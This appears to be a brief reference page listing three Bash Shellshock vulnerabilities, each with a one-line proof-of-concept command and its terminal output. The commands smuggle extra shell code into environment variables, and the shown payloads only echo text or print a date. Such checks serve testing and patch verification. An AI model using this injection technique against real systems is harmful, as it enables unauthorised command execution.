1989

CVE-2014-6271

the original Shellshock


$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test

CVE-2014-7169

aka AfterShock


$ env var='() {(a)=>\' bash -c "echo date"; cat echo
bash: var: line 1: syntax error near unexpected token `='
bash: var: line 1: `'
bash: error importing function definition for `var'
Tue Oct  7 02:09:01 EDT 2014

CVE-2014-6277

still not fixed


$ var='() { echo vulnerable; }' bash -c var
vulnerable